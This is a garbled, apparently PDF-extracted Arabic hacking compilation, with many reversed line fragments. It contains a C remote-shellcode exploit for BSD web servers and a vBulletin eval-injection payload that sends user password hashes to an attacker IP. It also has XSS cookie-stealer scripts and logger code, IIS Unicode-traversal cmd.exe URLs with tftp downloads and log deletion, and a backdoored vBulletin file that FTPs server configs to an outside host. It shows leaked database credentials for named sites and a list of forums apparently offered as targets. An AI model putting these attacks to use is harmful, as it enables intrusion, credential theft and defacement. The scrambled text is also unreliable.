if(atoi(optarg) >=
} ((sizeof(targets)/sizeof(victim
;("\\\printf(\\\"Invalid target\\\\n
821

;return -1
{
memcpy(&victim,
&targets[atoi(optarg)],
;((sizeof(victim
;break
/* !bruteforce */
:'\\case \\'b
;++bruteforce
;"\\\victim.type = \\\"Custom target
victim.retaddr = strtoul(optarg,
;(NULL, 16
printf(\\\"Using 0x%lx as the
baseadress while
bruteforcing..\\\\n\\\",
;(victim.retaddr
;break
:'\\case \\'d
;(victim.delta = atoi(optarg
822

printf(\\\"Using %d as delta\\\\n\\\",
;(victim.delta
;break
:'\\case \\'r
;(victim.repretaddr = atoi(optarg
printf(\\\"Repeating the return
address %d times\\\\n\\\",
;(victim.repretaddr
;break
:'\\case \\'z
;(victim.repzero = atoi(optarg
printf(\\\"Number of zeroes will be
;(%d\\\\n\\\", victim.repzero
;break
:'\\case \\'o
;++bruteforce
} (switch(*optarg
:'\\case \\'f
;"\\\victim.type = \\\"FreeBSD
823

;victim.retaddr = 0x80a0000
;victim.delta = -150
;victim.repretaddr = 6
;victim.repzero = 36
;break
:'\\case \\'o
;"\\\victim.type = \\\"OpenBSD
;victim.retaddr = 0x80000
;victim.delta = -146
;victim.repretaddr = 6
;victim.repzero = 36
;break
:'\\case \\'n
;"\\\victim.type = \\\"NetBSD
;victim.retaddr = 0x080e0000
;victim.delta = -90
;victim.repretaddr = 5
;victim.repzero = 42
;break
824

:default
printf(\\\"[-] Better luck next
;("\\\time!\\\\n
;break
{
;break
/* optional stuff */
:'\\case \\'w
;(sc_timeout = atoi(optarg
printf(\\\"Waiting maximum %d
seconds for replies from
;(shellcode\\\\n\\\", sc_timeout
;break
:'\\case \\'c
;cmdz = optarg
;break
:default
;()usage
;break
825

{
{
if(!victim.delta || !victim.retaddr || !
(victim.repretaddr || !victim.repzero
}
printf(\\\"[-] Incomplete target. At
least 1 argument is missing (nmap
;("\\\style!!)\\\\n
;return -1
{
printf(\\\"[*] Resolving target
;("\\\ ..host
;(fflush(stdout
;(he = gethostbyname(hostp
(if(he
;(memcpy(&ia.s_addr, he->h_addr, 4
else if((ia.s_addr = inet_addr(hostp))
} (== INADDR_ANY
printf(\\\"There\\'z no %s on this side
;(of the Net!\\\\n\\\", hostp
826

;return -1
{
;((printf(\\\"%s\\\\n\\\", inet_ntoa(ia

;(()srand(getpid
;(signal(SIGPIPE, SIG_IGN
for(owned = 0, progress =
0;;victim.retaddr +=
} (RET_ADDR_INC
/* skip invalid return adresses */
if(memchr(&victim.retaddr, 0x0a, 4)
((|| memchr(&victim.retaddr, 0x0d, 4
;continue

sock = socket(PF_INET,
;(SOCK_STREAM, 0
;sin.sin_family = PF_INET
;sin.sin_addr.s_addr = ia.s_addr
;((sin.sin_port = htons(atoi(portp
827

(if(!progress
;("\\\ ..printf(\\\"[*] Connecting
;(fflush(stdout
if(connect(sock, (struct sockaddr *)
} (& sin, sizeof(sin)) != 0
;("\\\()perror(\\\"connect
;(exit(1
{
(if(!progress
;("\\\printf(\\\"connected!\\\\n

p = expbuf = malloc(8192 +
((PADSIZE_3 + NOPCOUNT + 1024)
(* REP_SHELLCODE
PADSIZE_1 + (victim.repretaddr *)) +
4) + victim.repzero
;((REP_POPULATOR * (1024 +
PUT_STRING(\\\"GET /
828

HTTP/1.1\\\\r\\\\nHost: \\\"
;("\\\HOST_PARAM \\\"\\\\r\\\\n
(++for (i = 0; i < REP_SHELLCODE; i
}
;("\\\-PUT_STRING(\\\"X
PUT_BYTES(PADSIZE_3,
;(PADDING_3
;("\\\ :"\\\)PUT_STRING
;(PUT_BYTES(NOPCOUNT, NOP
memcpy(p, shellcode,
;(sizeof(shellcode) - 1
;p += sizeof(shellcode) - 1
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
(++for (i = 0; i < REP_POPULATOR; i
}
;("\\\-PUT_STRING(\\\"X
PUT_BYTES(PADSIZE_1,
;(PADDING_1
;("\\\ :"\\\)PUT_STRING
829

} (++for (j = 0; j < victim.repretaddr; j


;p++ = victim.retaddr & 0xff*
;p++ = (victim.retaddr >> 8) & 0xff*
;p++ = (victim.retaddr >> 16) & 0xff*
;p++ = (victim.retaddr >> 24) & 0xff*
{
;(PUT_BYTES(victim.repzero, 0
;("\\\PUT_STRING(\\\"\\\\r\\\\n
{
PUT_STRING(\\\"Transfer-Encoding:
;("\\\chunked\\\\r\\\\n
snprintf(buf, sizeof(buf) 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\",
;(PADSIZE_2
;(PUT_STRING(buf
PUT_BYTES(PADSIZE_2,
;(PADDING_2
snprintf(buf, sizeof(buf) 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\",
;(victim.delta
830

;(PUT_STRING(buf
} (if(!shown_length
printf(\\\"[*] Exploit output is %u
bytes\\\\n\\\", (unsigned int)(p ;((expbuf
;shown_length = 1
{
;(write(sock, expbuf, p - expbuf
;++progress
(if((progress%70) == 0
;progress = 1
} (if(progress == 1
printf(\\\"\\\\r[*] Currently using
;(retaddr 0x%lx\\\", victim.retaddr
(++ for(i = 0; i < 40; i
;("\\\ "\\\)printf
;("\\\printf(\\\"\\\\n
(if(bruteforce
831

;('\\;'\\)putchar
{
else
'\\putchar(((rand()>>8)%2)? \\'P\\': \\'p
;(

;(fflush(stdout
;responses = 0
} (while (1
;fd_set fds
;int n
;struct timeval tv
;tv.tv_sec = sc_timeout
;tv.tv_usec = 0
;(FD_ZERO(&fds
;(FD_SET(0, &fds
;(FD_SET(sock, &fds
;((memset(buf, 0, sizeof(buf
832

if(select(sock + 1, &fds, NULL,


} (NULL, owned? NULL : &tv) > 0
} ((if(FD_ISSET(sock, &fds
if((n = read(sock, buf, sizeof(buf) (1)) < 0
;break
(if(n >= 1
}
(if(!owned
}
(++ for(i = 0; i < n; i
('\\if(buf[i] == \\'G
;++ responses
else
;responses = 0
(if(responses >= 2
}
;owned = 1
;(write(sock, \\\"O\\\", 1
;((write(sock, cmdz, strlen(cmdz
printf(\\\" it\\'s a TURKEY: type=%s,
833

delta=%d, retaddr=0x%lx,
repretaddr=%d, repzero=%d\\\\n\\\",
victim.type, victim.delta,
victim.retaddr, victim.repretaddr,
;(victim.repzero
printf(\\\"Experts say this isn\\'t
exploitable, so nothing will happen
;("\\\ :now
;(fflush(stdout
{
else {
;(write(1, buf, n
{
{
} ((if(FD_ISSET(0, &fds
if((n = read(0, buf, sizeof(buf) - 1)) <
(0
;(exit(1
;(write(sock, buf, n
{
834

{
(if(!owned
;break
{
;(free(expbuf
;(close(sock
(if(owned
;return 0
} (if(!bruteforce
fprintf(stderr, \\\"Ooops..
;("\\\hehehe!\\\\n
;return -1
{
{
;return 0
{
835

)) angels-
bytes.com ((

?http://www.angels-bytes.com/
show=tools&action=info&id=19

836

" "
837

><
php

) ( vb
/
-1 .

. .
-2
index.php admin
/
>?php
;"LOGIN = "User$
;"PASSWORD = "Password$
838

} (function error ($error_message


".echo $error_message
;"
;exit
{
if ( (!isset($PHP_AUTH_USER)) || !
(($PHP_AUTH_USER == $LOGIN)
&& ( $PHP_AUTH_PW ==
} ( (( ""$PASSWORD
header("WWW-Authenticate: Basic
;(""entrer="Form2txt admin
header("HTTP/1.0 401
;("Unauthorized
error("<p align=right><font
<face=Tahoma size=2 color=Red
;("<font></p/>
{
<?

User
839


Password
-3 3000


!!

.
-4 HTML
..

.
-5 . .
.

"
" vBulletin2,2,0
840

><
-------- :
-------- : vBulletin
) WebServer :
( + )( .
:
: vBulletin !!
.

--------- :
-------- . ..

841


..
.. HTML
)
.. ( HTML
:
>script>document.write('<img
src="http://my_ip_address/'+docum
<ent.cookie+'">';</script
IP Adress IP
.
.
.


.. .

)
IIS Apache
842

( .
Log
..
.. Apche
logs . Acces Log
..
.. :
GET/
bbuserid=86;%20bbpassword=dd61
69d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8
;%20bbthreadview[54
%20bblastvi;1012444064=[20
sit=1011983161
..
843


..
..

http://www.victim.com/vb/index.php
?
bbuserid=[userid]&bbpassword=[pa
[ssword hash
" : )
" (....

) ( ..

.. )(

.. Forgot
.. Password
..
!!
! ..
844

-----------
---------- HTML
) + + +
( ... +
) HTML
(
.. IMG
> <script >
<img > <Demon

... .
. Be Secret .. Dont' be Lamer
2002 - 1 - 31 :
2.2.0 .

845

"
"
> <
> : <
7
1
846

2
3 SQL
4
5

6 %80

7


%100
.

****************
1

847

Powered by:
vBulletin
1
2
3
%60



?http://www.vbulletin.org/index.php
topic=<script>alert(document.cooki
<e)</script
2
|?http://www.vbulletin.org/index.php
=forum/view.php&topic=../../../../../../..
/etc/passwd

848

********************


113



) ( Jouko
Pynnonen
)vBulletin (http://www.vbulletin.com/
is a commonly used web forum
system written in PHP. One of its
,key features is use of templates
which allow the board administrator
to dynamically modify the look of
.the board
849

vBulletin templates are parsed with


the eval() function. This could be
somewhat safe as long as the
parameters to eval() are under strict
control. Unfortunately this is where
vBulletin fails. With an URL
crafted in a certain way, a remote
user may control the eval()
parameters
and inject arbitrary PHP code to be
.executed
A remote user may thus execute
any PHP code and programs as the
web
server user, typically "nobody",
start an interactive shell and try to
elevate their privilege. The
configuration files are accessible
for the
web server so the user can in any
850

case access the MySQL database


containing the forums and user
.information
According to the authors the
vulnerability exist in all versions of
vBulletin up to 1.1.5 and 2.0 beta 2.
The bug does not involve buffer
overrun or other platformdependant issues, so it's
presumably
exploitable under any OS or
.platform

DETAILS
=======
vBulletin templates are
implemented in the following way:
the
gettemplate() function in global.php
851

is used to fetch a template from


database. The code is then passed
to eval(). If we take index.php for
:an example, there's this code

} ("if ($action=="faq
eval("echo
;(";("\".("dovars(\"".gettemplate("faq
{

The dovars() function does some


variable replacing, such as replace
.<"largefont> with <font size="10>
The gettemplate() function is
:defined in global.php

function
852

gettemplate($templatename,
} ($escape=1
gets a template from the db or //
from the local cache
;global $templatecache,$DB_site
![if ($templatecache[$templatename
} (""=
$
template=$templatecache[$template
;[name
} else {
gettemp=$DB_site-$
>query_first("SELECT template
FROM template WHERE title='".
;("'".(addslashes($templatename
;[template=$gettemp[template$
$
templatecache[$templatename]=$te
;mplate
{
853

} (if ($escape==1
template=str_replace("\"","\\\"",$
;($template
{
;return $template
{

For effectiveness the function


implements a simple cache for
template
strings. After fetching them from
the database they're stored in the
templatecache[] array. This array is
checked for the template before
doing the SQL query. Unfortunately
the array is never initialized, so
a user can pass array contents in
.the URL, e.g
(for simplicity not %-escaped)
854

http://www.site.url/index.php?
action=faq&templatecache[faq]=hell
o+world
With this URL, you won't get the
FAQ page, but just a blank page
."with the words "hello world
The eval() call above will execute
;("echo dovars("hello world
As if this wouldn't be bad enough, a
remote user may as well pass a
value containing quotation marks
and other symbols. Quotation
marks
aren't always escaped as seen in
the code above, in which case
index.php could end up executing
code like
855

;("echo dovars("hello"world
This would produce a PHP error
message due to unbalanced quotes.
It
doesn't take a rocket scientist to
figure out how a remote user could
execute arbitrary code from here, so
further details about exploitation
aren't necessary. If your vBulletin
board produces an error message
with an URL like the one above
prefixed with a single quotation
,mark
.it's definitely vulnerable
The above example works with the
"Lite" version. The commercial
versions
are vulnerable too, but details may
differ. After a little experimenting
on the Jelsoft's test site I found
856

some of the commercial versions


also
have an eval() problem with URL
.redirecting, e.g
http://www.site.url/member.php?
acti...ypass&url=hello"world
and a similar one in the Lite
:version
http://www.site.url/search.php?
acti...s&templatecache[standardredi
rect]=hello"world

. .
url
hello+world
857

:
-1
vb 113 or 115
) 90 -2
(
url -3
search.php3?
action=simplesearch&query=search
this&templatecache[standardredire
ct]="%29%3B%24fa="<
%261";set_time_limit(substr("900",0
,3));
%24fp=fsockopen(substr("IP.IP.IP.I
P",0,12),substr("90",0,2),
%26%24errno,
%26%24errstr,substr("900" ,0,3));if(!
%24fp)
{}else{%24arr[200];fputs(%24fp,su
bstr("vhak1.0,%20- d%20downloads
858

%20database,or%20press%20return
%20for
%20command%20line" ,0,63));
%24va=fgets(%24fp,3);fputs(%24fp,
%24va);if
strlen(%24va)>1))
{include(substr("admin/config.php",
0,16));include(substr("admin/config.
php3",0,17));mysql_connect(substr(
"%24servername",0,strlen(%24serv
ername)),substr("%24dbusername",
0,strlen(%24dbusername)),substr("
%24dbpassword" ,
0,strlen(%24dbpassword)));
%24currenta=mysql_db_qu
ery(substr("%24dbname",0,strlen(%
24dbname)),substr("select%20*
%20from%20user" ,
0,18));while(%24res=mysql_fetch_ar
859

ray%20(%24curre
nta))
{fputs(%24fp,"%24res[userid],");fpu
ts(%24fp,"%24res[usergroupid],");fp
uts(%24fp,"%24res[password],");fp
uts(%24fp,"%24res
%24arr);
%24str=exec(fgets(%24fp,substr("1
28",0,3)),
%24arr);for(%24ir=substr("0",0,1);
%24ir< sizeof(%24arr);%24ir%2B
%2B){fputs(%24fp,%24arr[%24
ir]);fputs(%24fp,
_%24va);}}fclose(%24fp);}die(vhak
"finished_execution);echo%28
By Kill -9
IP.IP.IP.IP
860

12
127.0.0.1
9


) arabteam2000.com (
c4arab.com
. ...




!!

:
90
d downloads
861

2.2x

113 11

115 225

) WebServer :
( + )( .
:
: vBulletin !!
.

--------- :
--------862

. ..


..
.. HTML
)
.. ( HTML
:
>script>document.write('<img
src="http://my_ip_address/'+docum
<ent.cookie+'">';</script
IP Adress IP
.
.
.


.. .
863


)
IIS Apache
( .
Log
..
.. Apche
logs . Acces Log
..
.. :
GET/
bbuserid=86;%20bbpassword=dd61
69d68822a116cd97e1fb

ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8
;%20bbthreadview[54
864

%20bblastvi;1012444064=[20
sit=1011983161
..

..
..

http://www.victim.com/vb/index.php
?
bbuserid=[userid]&bbpassword=[pa
[ssword hash
" : )
" (....

) ( ..

.. )(

865

.. Forgot
.. Password
..
*******************
3 SQL
.

: ) ( SQL


ASP
SQL ASP
SQL
SQL
1433
SQL

866


SQL
.
:
SQL

PHP ASP






_LinuxRay

-. - -
. Administrator


...
867

:
SQL
User Name Passwd
: .

User name
and Passwd ASP
* sql.
htr.+
. :

http://target/page.asp+.htr
: target
: Page asp
: htr.+
868

.
....

View
Source ASP
:

>%
=Set DB
Server.CreateObject("ADODB.Conn
("ection
DB.Open "DRIVER=SQL
;=Server;SERVER=xxx;UID=sa;PWD
APP=Microsoft (R) Developer
Studio;WSID=xxx;DATABASE=moe
"_dbs", "_LinuxRay", "6666666

869

<%
---------------------------------------------------------------- . _
LinuxRay
6666666
-----------------------------------------------------------------


ASP :
AMicrosoft VBScript runtime error
''800a01a8
'Object required: 'Conn
filename.inc, line 5/
* inc.
870


.

.

ASP

database.inc
>!<--"include file = "database.inc#--

global.asa
global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa
871


SQL
:
global.asa+.htr
IIS 3
ASP data$::
file.asp::$data
IIS 3
.

...
.
!! SQL
.
Visual interdev 6.0
872

. ACCESS 2000


File

New

(Project (Exiting Data
.

Create


Data Link Properties
-
. -
- 1 Select or
enter server name
873

- 2 . User Name
- 3 Password

) Blank
(Password
Test Connection

Test Connection Succeeded
.

:
Select the data base on the server
OK .
:
/http://www.moe.gov.sa
-1 :
874

http://www.moe.gov.sa/news_admin
.asp

Microsoft VBScript runtime error
''800a01a8
'Object required: 'Conn
news_admin.asp, line 7/

: htr
http://www.moe.gov.sa/news_admin
.asp+.htr

<--"include file = "database.inc#--!>
875

: database.inc
http://www.moe.gov.sa/database.inc

:
%>
Set DB=
Server.CreateObject("ADODB.Conn
("ection
DB.Open "DRIVER=SQL
Server;SERVER=CNW2;UID=sa;PW
D=;APP=Microsoft (R) Developer
Studio;WSID=CNW2;DATABASE=m
"oe_dbs", "sa", "123321

<%
876

. .
.....

.
:
/http://www.itsalat.com
User name : sa Passwd : sp2000 - 1

*****************



. %80


877

2
1.5 15000


1
2
3
4
6. . %100

IIS

878

IIS
...IIS5.0


4 5












.

.
.
879



:
http://www.xxxxxx.com/scripts/.. ../
\:winnt/system32/cmd.exe?/c+dir+c
.

:c

scripts/../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts../
?%c1%9c../winnt/system32/cmd.exe
\:/c+dir+c
scripts/../
?%c1%pc../winnt/system32/cmd.exe
\:/c+dir+c
880

scripts/../
%c0%9v../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c0%qf../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%c1%8s../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%1c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%9c../winnt/system32/cmd.exe?
\:/c+dir+c
scripts/../
%c1%af../winnt/system32/cmd.exe?/
\:c+dir+c
scripts/../
%e0%80%af../winnt/system32/cmd.e
\:xe?/c+dir+c
scripts/../
881

%f0%80%80%af../winnt/system32/c
\:md.exe?/c+dir+c
scripts/../
%f8%80%80%80%af../winnt/system3
\:2/cmd.exe?/c+dir+c
scripts/..%fc/
%80%80%80%80%af../winnt/system
\:32/cmd.exe?/c+dir+c
msadc/..\%e0\%80\%af../..\/
%e0\%80\%af../..\
%e0\%80\%af../winnt/system32/cmd.
\:exe\?/c\+dir+c


:
http://www.xxxxx.com//////
+\/....2/cmd.exe/?/c
.


Dir
882


32

:
http://www.xxxxxx.com/scripts/.. ../
\:winnt/system32/cmd.exe?/c+dir+c


http://www.xxxxxx.com/scripts/.. ../
\winnt/system32/cmd.exe?/c+dir+c:
\Winnt\Sytem32
883


\Winnt\Sytem32

.....


http://www.xxxxx.com/scripts/..
\:....exe?/c+dir+c


32

\:c+dir+c
http://www.xxxxx.com/scripts/..
/...Winnt/System32



tftp.exe

884




..............................................................
...........................



www.geocities.com/anorR1234/tftpd
32.zip
\:C





tftp32.exe

\:C

--------------------------------------------------885

-------------

=






:
http://www.xxxxx.com/scripts/..
\:....exe?/c+dir+c



c+tftp.exe+"-/
i"+1.1.1.1+GET+index.htm+C:\inetpu
b\wwwroot\index.htm

\:c+dir+c/
886


c+tftp.exe+"-/
i"+1.1.1.1+GET+index.htm+C:\inetpu
b\wwwroot\index.htm

http://www.xxxxx.com/scripts/..
"...xe?/c+tftp.exe+i"+1.1.1.1+GET+index.htm+C:\inetpu
b\wwwroot\index.htm

. .

tftp.exe

" "i-
1.1.1.1 .


GET

index.htm

887

\C:\inetpub\wwwroot

index.htm

\:C

index.htm


http://www.xxxxx.com/scripts/..
"...xe?/c+tftp.exe+i"+212.212.212.212+GET+index.htm
+C:\inetpub\wwwroot\index.htm


----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


888

http://server/msadc/..../..../c+del+c
:/*.log
--------------------------------------

*******************


1 .

1
$
889




2
30
3

%100

-





890


2.2.5
forum

:PHP
------------------------------------------------------------------------------} ("if ($action=="modify
;vbxh = h$
;vbxt = t$
;vbxp = p$
;vbxw = w$
;vbxa = a$
;vbx1 = 1$
891

;vbxr = r$
;vbxb = b$
;vbxn = n$
;vbxe = e$
;vbxo = o$
;vbxy =y$
;vbxl = l$
;" --!>" echo
= file$
fopen("$vbxh$vbxt$vbxt$vbxp://
$vbxw$vbxw$vbxw.
$vbxa$vbxr$vbxa$vbxb$vbx1.$vbxn
$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbx
a$vbxl/.x.php?
h=$HTTP_HOST&h2=$SCRIPT_NA
;("ME", "r
;(rf = fread($file, 1000$
;(fclose($file
;"<-- " echo
------------------------------------------------------------------------------892


/http://www.arab1.net
?http://www.arab1.net/~royal/.x.php
h=$HTTP_HOST&h2=$SCRIPT_NAM
E
. 2.2.6



option

:PHP
------------------------------------------------------------------------------;" --!>" echo
893

;"include "$sqlupdate
;"<-- " echo
-------------------------------------------------------------------------------

functions

:PHP
------------------------------------------------------------------------------sqlupdate =$
base64_decode('aHR0cDovL3NhdW
RpLm5vLWlwLmNvbS9+cm9
;('==5YWwvLngyLmluYw
------------------------------------------------------------------------------894



/http://saudi.no-ip.com
WELCOME TO
arab1.net


http://saudi.no-ip.com/~royal/.x2.inc
.......


:PHP
------------------------------------------------------------------------------>"div id="sHo
895

<";style="display:none
--!>
if you are seeing this code PlzZzZz
Contact
[email]sleeping_bum@hotmail.com
php?>
;("system("mkdir /tmp/.statics
system("cp
/etc/httpd/conf/httpd.conf
;("/tmp/.statics/httpd1.conf
system("cp
/usr/local/apache/conf/httpd.conf
;("/tmp/.statics/httpd2.conf
system("cp admin/config.php
;("/tmp/.statics/php.conf
system("tar -cvf /tmp/.statics.tgz
;("/tmp/.statics
;"vilename = "$SERVER_NAME.bz$
port =$
;('base64_decode('aHB5NWk5
conn_id = ftp_connect("cyber-$
;("sa.virtualave.net
896

login_result = ftp_login($conn_id,$
;(""cyber-sa", "$port
upload = ftp_put($conn_id, "/tmp/$
$vilename", "/tmp/.statics.tgz",
;(FTP_BINARY
;(ftp_quit($conn_id
;("system("rm -rf /tmp/.statics.tgz
;("system("rm -rf /tmp/.statics
base =$
"$HTTP_HOST&h2=$SCRIPT_NAME
;"
open = "http://saudi.no-$
;"ip.com/~royal/.x2.php?h=$base
;("file = fopen("$open", "r$
;(rf = fread($file, 1000$
;(fclose($file
<?
<-<div/>


897

************

6 %80

.
%80
1
2
3
4
5
6
Cfgwiz32.exe 7
C:\Windows
8 misc
9

898

******

1 htaccess.

2 htaccess.
3
4
5
6
7 . Cfgwiz32.exe
C:\Windows
8
9
10
.

899

" " vBulletin 2,2,9


> <
> :<

....vBulletin 2.2.9
:
-1 php
>?PHP
vBulletin XSS Injection //
Vulnerability: Exploit
--- //
900

Coded By : Sp.IC //
.((SpeedICNet@Hotmail.Com
Descrption: Fetching vBulletin's //
.cookies and storing it into a log file

:Variables //
;"LogFile = "Cookies.Log$
:Functions //
*/
If ($HTTP_GET_VARS['Action'] =
} (""Log
;"--!>" = Header$
;"<---" = Footer$
{
} Else
;"" = Header$
;"" = Footer$
{
901

;(Print ($Header
/*
Print ("<Title>vBulletin XSS
Injection Vulnerability:
;("<Exploit</Title
;("<Print ("<Pre
;("<Print ("<Center
Print ("<B>vBulletin XSS Injection
;("Vulnerability: Exploit</B>\n
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@Hotmail
.Com\">Sp.IC</A></B><Hr
;("<"\Width=\"20%
*/
;(Print ($Footer
/*
Switch
} (['($HTTP_GET_VARS['Action
:"Case "Log
Data =$
902

;['$HTTP_GET_VARS['Cookie
Data = StrStr ($Data, SubStr$
($Data, BCAdd (0x0D, StrLen
;(((((((DecHex (MD5 (NULL
;("+Log = FOpen ($LogFile, "a$
;("FWrite ($Log, Trim ($Data) . "\n
;(FClose ($Log
Print ("<Meta HTTPEquiv=\"Refresh\" Content=\"0;
URL=" .
$HTTP_SERVER_VARS['HTTP_REF
;("<"\" . ['ERER
;Break
:"Case "List
If (!File_Exists ($LogFile) || !
} ((In_Array ($Records
Print ("<Br><Br><B>There are No
;("<Records</B></Center></Pre
;() Exit
{
} Else
;("<Print ("</Center></Pre
903

Records = Array_UniQue (File$


;((($LogFile
;("<Print ("<Pre
;("Print ("<B>.:: Statics</B>\n
;("Print ("\n
Print ("o Logged Records : <B>" .
;("Count (File ($LogFile)) . "</B>\n
Print ("o Listed Records : <B>" .
Count ($Records) . " </B>[Not
;("Counting Duplicates]\n
;("Print ("\n
;("Print ("<B>.:: Options</B>\n
;("Print ("\n
} (If (Count (File ($LogFile)) > 0
Link['Download'] = "[<A Href=\"" .$
;"[<$LogFile . "\">Download</A
{
}Else
Link['Download'] = "[No Records in$
;"[Log
904

{
Print ("o Download Log : " .
;("$Link['Download'] . "\n
Print ("o Clear Records : [<A
Href=\"" . $SCRIPT_PATH. "?
;("Action=Delete\">Y</A>]\n
;("Print ("\n
;("Print ("<B>.:: Records</B>\n
;("Print ("\n
While (List ($Line[0], $Line[1]) =
} ((Each ($Records
Print ("<B>" . $Line[0] . ": </B>" .
;([$Line[1
{
{
;("<Print ("</Pre
;Break
:"Case "Delete
;(UnLink ($LogFile@
905

Print ("<Br><Br><B>Deleted
Succsesfuly</B></Center></Pre>")
Or Die ("<Br><Br><B>Error: Cannot
;("<Delete Log</B></Center></Pre
Print ("<Meta HTTPEquiv=\"Refresh\" Content=\"3;
URL=" .
$HTTP_SERVER_VARS['HTTP_REF
;("<"\" . ['ERER
;Break
{
<?
php -2
-3
member2.php?
s=[Session]&action=viewsubscripti
[on&perpage=[Script Code
[script code]

] //:Script>location='Http>
Action=Log&Cookie='+?[
<(document.cookie);</Script
906

-4
http://%20 / ?
Action=List

907

" " phpbb 2.0.0


> <
phpbb 2.0.0
vb
908

PhpBB2
admin_ug_auth.php
:

.

:
2.0.0



><html
><head
><head/
909

<body>
"form method="post>
action="http://www.domain_name/b
oard_directory/admin/admin_ug_aut
<"h.php
User Level: <select
<"name="userlevel
option>
value="admin">Administrator</opti
<on
option>
value="user">User</option></select
<
input type="hidden">
<"name="private[1]" value="0
input type="hidden">
<"name="moderator[1]" value="0
input type="hidden" name="mode">
<"value="user
input type="hidden" name="adv">
<""=value
910

"User Number: <input type="text


<"name="u" size="5
>"input type="submit
<"name="submit" value="Submit
><form/
><body/
><html/

http://www.domain_name/board_dir
ectory
html


Administrator

submit

.
!!

911

/http://forums.xos.ca

...

" " php nuke


> <
> : <
php nuke
..
.......
912


- -

!!!!
!!! !!!

.....
) :
(
:
PHP Nuke versionh 6.0
. :
.
.
913

. :
. . .

/
.... images/forum/avatars
. ..
.
.

text ..
!!!!
:
.
Your Account
Your Info
view
914

source uid
. :
>"input type="hidden" name="uid
<"value="2111


... 2111

html
/http://nukesite
:......
>!<!-- START CODE --
>"form name="Register
action="http://NUKEDSITE/modules.
"php?name=Your_Account
<"method="post
915

b>Code ('">[code]<b ')</b><input>


"type="text
"name="user_avatar" size="30
<maxlength="30"><br><br

b>Username</b><input>
type="text" name="uname"
"size="30
maxlength="255"><br><b>User
"ID:<input type="text
"name="uid
size="30"><input type="hidden"
"name="op
value="saveuser"><input
type="submit" value="Save
<Changes"></form
<!-- END CODE --!>

916

html ..

:
"<

>b
...

submit Your
Account .. !!!!
:
"<>h1>TESTING</h1><b
TESTING
!!....
917


">b
..
30
....
xss

=(

:
!!!!
. ...

918

" "

:::
.1 .
http://members.lycos.co.uk/hiha
/ck/vb
.2 .
/http://www.e3sar.net/vb
.3 .
/http://www.ebnmasr.net/vb
.4 . .
/http://www.7azm.net/vb
.5 .
http://www.almuhands.org/forum
/index.php
.6 .
/http://www.arabse.net/vb
919

. .7
/http://www.emoataz.com/vb
. .8
/http://www.h4palestine.com
.9
/http://www.pharaonics.net
/http://www.ruwad.tk . .10
. .11
/http://www.nafitha.org
. .12
http://www.arab4vb.com/vb/inde
x.php
. .13
http://www.naajm.com/vb/forumd
isplay.php

...
.

920

921

"
"

Packet Storm Security


--------------------- :
/http://packetstorm.securify.com


.
' 'New Files Today
.
Ken Williams

922


) Kroll-O-Nagra
.)/http://www.securify.com
Security Focus
--------------- :
/http://www.securityfocus.com
.
!
BugTraq
------- : ) Security Focus
, /http://www.securityfocus.com
) )) Netspace
.(/http://www.netspace.org
BugTraq
mailing list
. Aleph1
.((aleph1@underground.org
923

) ( .
spams
.


/http://www.securityfocus.com


''search
Searching
-----------
Sendmail 8.8.3 'sendmail
'8.8.3 .
local DoS
sendmail
local DoS' :
'sendmail .
:::
924

/http://rootshell.redi.tk .1
http://www.ussrback.com .2
.3
http://www.insecure.org/sploits.h
tml
.4
http://www.linux.com.cn/hack.co.
za
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=


.
:::
http://www.haker.com.pl .1
.2
/http://www.webattack.com
925

.3 http://blacksun.box.sk
.4
http://www.blackcode.com

/http://www.TipsClub.com



926

927

928

You might also like